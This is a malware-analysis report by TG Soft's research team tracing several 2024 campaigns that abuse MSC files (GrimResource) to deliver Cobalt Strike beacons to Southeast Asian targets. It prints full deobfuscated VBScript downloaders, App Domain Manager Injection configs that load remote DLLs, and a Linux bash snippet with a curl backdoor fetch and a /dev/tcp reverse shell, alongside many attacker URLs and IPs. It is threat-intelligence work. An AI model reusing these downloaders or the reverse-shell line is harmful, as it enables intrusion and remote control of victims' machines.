Over the past few months, TG Soft's C.R.A.M. has been monitoring different threat actors abusing MSC files.
The first APT group to use .MSC files in their attacks was #Kimsuky in April 2024, as reported by company Genians.
In May 2024, the use of this technique was also observed by the APT group known as #MustangPanda, which carries the #PlugX malware as reported by NTT.
In June 2024, the abuse of .MSC files was detected with the vulnerability called #GrimResource as reported by Elastic.
TG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware campaigns carried out by an unknown cyber-actor that is most likely of Chinese origin to target Southeast Asia.
Below is the timeline of the monitored attacks:
The first campaign we analyzed is that of August 2, 2024.
[upd 2024-08-26 -> The timeline has been updated: the campaign identified on 2024/08/23 was delivered on 2024/08/19]
Campaign Analysis
Campaign of August 2, 2024
On August 2, 2024, an email campaign was released with the following file attached:
Translating the file name from Chinese to english, the document refers to:
Detailed information on water pollution.msc
The image of the infection chain is shown in the figure:
The MSC file via the vulnerability known as
GrimResource automatically executes the following script:
Decripting it gives the following more readable script:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config"
strURL3 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt"
strShowfileURL = "https[:]//wordpresss-data[.]s3.me-south-1[.]amazonaws[.]com/ws.pdf"
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\oncesvc.exe.config"
strDownloadPath3 = "C:\Users\Public\water.txt"
strShowfilePath = "C:\Users\Public\wrasb.pdf"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub |
The script downloads the following files into the C:\Users\Public folder:
- oncesvc.exe (Microsoft legitimate file "ClickOnce")
- oncesvc.exe.config (Configuration file to load malicious DLL)
- water.txt (Unused file, probably to track infection)
- ws.pdf (Decoy)
Below we see the images of the decoy PDF file:
The oncesvc.exe.config file contains the following configuration:
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity name="oncesvc" publicKeyToken="205fcab1ea048820" culture="neutral" />
<codeBase version="" href="https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg"/>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="oncesvc, Version=, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
<appDomainManagerType value="oncesvc" />
</configuration> |
which allows to load the malicious DLL from the address https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg through the App Domain Manager Injection technique.
The malicious DLL that is executed by the ONCESVC.EXE process, download from the site https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111522.jpeg a completely diskless 64-bit shellcode.
In the figure we can see the decryption of the obfuscated URL with AES and the execution of the downloaded shellcode thread:
The shellocode uses a custom
DBJ2 algorithm to determine the hash of the API names to use, as we see in the figure:
The 64bit shellcode connects to domain status[.]s3cloud-azure[.]com on the port 8080 at the page:
/common/oauth2/authorize?client_id=<ID del cliente>
by sending the following request via post:
The following information is sent in base 64 in the client_id field:
- username with an indication of whether it is Administrator (isAdmin)
- PC name
- process name
- indication of the architecture of the operating system (32 or 64 bit)
- system memory
Then the shellcode calls the following page: /api/v1/homepage/<id>
If the answer you get is different from:
then a new shellcode is executed as we see in the figure:
During the analysis the shellcode downloaded and executed a third stage containing the Marte Beacon with CobaltStrike which connected to the site: static[.]trendmicrotech[.]com with 8443 port (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the pages:
- GET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts.
- POST /OneCollector/1.0
This version of CobaltStrike created the following pipe:
The August 2 campaign targeted the Taiwan government as reported by
Campaign of July 16, 2024
On July 16, 2024, the file
Cert.msc was uploaded to Virus Total from Vietnam .
It is assumed that this is the first campaign used by the threat actor exploiting the grim resource technique.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2
Dim strDownloadPath1, strDownloadPath2
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config"
strDownloadPath1 = "C:\Users\Public\Music\Cert.exe"
strDownloadPath2 = "C:\Users\Public\Music\Cert.exe.config"
strExecutablePath = "C:\Users\Public\Music\Cert.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
objShell.Run strExecutablePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub |
The script inside the MSC file downloads the following files:
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json
- https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg
The following files were not available during the analysis:
The Cert.exe file should have been the ServiceHub.Host.netfx.x64.exe program.
The Cert.exe.config file contains the following configuration:
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity name="ServiceHub" publicKeyToken="205fcab1ea048820" culture="neutral" />
<codeBase version="" href="https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json"/>
<etwEnable enabled="false" />
<appDomainManagerAssembly value="ServiceHub, Version=, Culture=neutral, PublicKeyToken=205fcab1ea048820" />
<appDomainManagerType value="ServiceHub" />
</configuration> |
It is assumed that the ServiceHub.json file is the malicious DLL that is loaded through the App Domain Manager Injection technique and the 205fcab1ea04882.jpg file instead directly contains the Marte Beacon with CobaltStrike that connected to the site: us2[.]s3bucket-azure[.]online (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the page "/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts"
The July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly executed the Marte Beacon with Cobalt Strike, as shown in the figure.:
Campaign of August 12, 2024
On August 12, 2024, the file
Document_new.pdf.msc was uploaded to Virus Total from Vietnam.
The MSC file contains an obfuscated script from which the following is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json"
strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config"
strURL3 = "https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe"
strShowfileURL = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf"
strDownloadPath1 = "C:\Windows\Temp\Service.exe"
strDownloadPath2 = "C:\Windows\Temp\Service.exe.config"
strDownloadPath3 = "C:\Users\Public\win.ini"
strShowfilePath = "C:\Users\Public\Documents\Documents.pdf"
strExecutablePath = "C:\Windows\Temp\Service.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub |
The only component we had access to was the calc.exe file, which was stored inside the public folder under the name win.ini.
During the analysis, it was not possible to recover most of the files used in the attack..
Campaign of August 15, 2024
On August 15, 2024, the file
readme(解压密码).msc was uploaded to Virus Total
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe"
strURL2 = "https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll"
strURL3 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config"
strShowfileURL = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx"
strDownloadPath1 = "C:\Users\Public\oncesvc.exe"
strDownloadPath2 = "C:\Users\Public\msedge.dll"
strDownloadPath3 = "C:\Users\Public\oncesvc.exe.config"
strShowfilePath = "C:\Users\Public\readme.docx"
strExecutablePath = "C:\Users\Public\oncesvc.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, True
objShell.Run strShowfilePath, 1, True
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub |
This campaign is similar to the one on August 2nd, where the oncesvc.exe file is used to load the malicious DLL downloaded from: https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.
Malicious DLL downloads 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.
The 64-bit shellcode is similar to the one seen on August 2nd, the command and control server in this case is
The post used in this case is:
{"user":"password1"}, slightly different than the August 2 campaign.
Again the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version seen in the August 2 campaign..
Campaign of August 20, 2024
On August 20, 2024, the file "
Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc" was uploaded to Virus Total.
The campaign targets Vietnam, translating the file name from Vietnamese would be "Instructions and requirements for inspection and supervision of the activities of each unit in 2024
The MSC file is similar to those seen in previous campaigns, the ONCESVC.EXE file is replaced with MUSICV.EXE.
The configuration file is the same as seen in the August 15 campaign, the same 64-bit shellcode is downloaded and the same Marte Beacon with Cobalt Strike.
Interesting is the decoy displayed on theme "
Vietnam Oil and Gas":
Campaign of August 19, 2024
On August 23, 2024, the file "
贵州电视台张青副台长腐败内部视频证据.msc" was uploaded to Virus Total.
The campaign may be targeting France and was delivered on August 19, 2024, as the file name translated from Chinese would be "Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV Station.msc".
The MSC file is similar to the one seen in the previous campaign on August 20, where the MUSICV.EXE program is used.
During the analysis, it was not possible to download the malicious DLL from the link https://speedshare.oss-cn-hongkong.aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json. The link is the same as the campaign of August 20th.
The MSC file contains an obfuscated script from which the following output is obtained:
Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe"
strURL2 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config"
strURL3 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt"
strShowfileURL = "http[:]//152[.]42[.]226[.]161/stime/1x.mp4"
strDownloadPath1 = "C:\Users\Public\Music\musicx.exe"
strDownloadPath2 = "C:\Users\Public\Music\musicx.exe.config"
strDownloadPath3 = "C:\Users\Public\Music\music.txt"
strShowfilePath = "C:\Users\Public\proton.mp4"
strExecutablePath = "C:\Users\Public\Music\musicx.exe"
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
If Not objFSO.FileExists(strDownloadPath1) Then
DownloadFile strURL1, strDownloadPath1
End If
If Not objFSO.FileExists(strDownloadPath2) Then
DownloadFile strURL2, strDownloadPath2
End If
If Not objFSO.FileExists(strDownloadPath3) Then
DownloadFile strURL3, strDownloadPath3
End If
If Not objFSO.FileExists(strShowfilePath) Then
DownloadFile strShowfileURL, strShowfilePath
End If
objShell.Run strExecutablePath, 1, False
objShell.Run strShowfilePath, 1, False
Sub DownloadFile(url, path)
Dim objStream
Set objStream = CreateObject("ADODB.Stream")
objHTTP.Open "GET", url, False
If objHTTP.Status = 200 Then
objStream.Type = 1 ' adTypeBinary
objStream.Write objHTTP.ResponseBody
objStream.SaveToFile path, 2 ' adSaveCreateOverWrite
End If
Set objStream = Nothing
End Sub |
Below we see some screenshots of the decoy video downloaded from
Inside the ZIP file sent via email containing the file 贵州电视台张青副台长腐败内部视频证据.msc the file 贵州电视台内部领导张青副台长腐败内幕.docx is also present, which we see below:
Other campaigns in April and May 2024
The analysis of the third stage of the Marte Beacon with Cobalt Strike has allowed us to associate the threat actor with three other campaigns launched between April and May:
- 27 aprile 2024 (Philippines)
- 7 maggio 2024 (Philippines)
- 17 maggio 2024 (Vietnam)
These campaigns did not abuse MSC files to be distributed.
The Marte Beacon with Cobalt Strike could be located from the following url: http://43.199.33[.]246:443/payload.bin
Analyzing the IP 43.199.33[.]246 The April 27 campaign was detected through the executable file named x1ffjiqd.exe, which downloaded and executed the following files:
- http://43.199.33[.]246:443/payload.bin
- http://43.199.33[.]246:443/example.pdf
The payload.bin file is the Marte Beacon with Cobalt Strike with C&C server visualstudio-microsoft[.]com and port 443.
The following decoy was used in the April 27 campaign:
The following decoy was used in the May 7 campaign:
In the May 17 campaign the following decoy was used with the name example.docx:
The IP address 43.199.33[.]246 is also associated with an ELF file (Linux) that downloads a backdoor as we can see from the code snippet below:
whoami > /tmp/test
curl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond
chmod 777 /tmp/google_usb_ssh
rm /tmp/google_usb_ssh
bash -i >& /dev/tcp/43[.]199[.]33[.]246/4433 0>&1
wget https[:]//download[.]chrorne[.]com/error.logs
gedit error.logs /dev/null -c /bin/sh |
The cybercriminal probably needed to hit a target with a Linux OS. This bash script is similar in behavior to the VisualBasic script used inside MSC files for Windows. In this case the decoy is the display of an email message contained in the "error.logs" file.
The campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia. With particular focus on the following countries: Philippines, Vietnam, and Taiwan.
From August 2nd onwards, the threat actor inserted a new module into its infection chain containing a 64-bit shellcode which then leads to the execution of a third stage with the Marte and Cobalt Strike beacons.
The modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin, it has been noted that the group is operational from Monday to Friday in hours compatible with Chinese ones.
Although it was not possible to make a precise attribution, it could be a subgroup of
Ing. Gianfranco Tonello, Michele Zuin